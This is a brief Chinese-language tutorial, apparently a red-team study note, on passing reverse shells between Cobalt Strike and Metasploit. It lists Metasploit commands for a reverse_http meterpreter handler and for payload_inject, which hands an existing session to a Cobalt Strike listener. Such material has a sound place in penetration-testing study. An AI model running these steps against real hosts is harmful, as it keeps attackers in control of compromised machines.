Cs的shell反弹到msf
参考资料:https://blog.csdn.net/Zlirving_/article/details/113862910
先建立监听器
先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip
Msf:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 172.17.0.3
set lport 6768
Run
一定要注意:此处标红的对应下面的两个,取决加不加s
然后返回前面的增加会话
执行choose
或者直接spawn msf
Msf的联动成功
msf的shell反弹到cs
先在 cs 开启监听,Cobalt Strike->Listeners-Add
,Name 随便填,Host 填写服务端 ip,Port 填写服务端设置的端口
首先msf中已有会话session 1
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true
set lhost 172.17.0.3 #cobaltstrike服务端ip
set lport 6633 #cobaltstrike服务端监听的端口
set session 1 #这里是当前获得的session的id
run
可以看到 cs 成功接收到 shell
此处还是需要去点一下增加会话,选择到msf弹cs
成功联动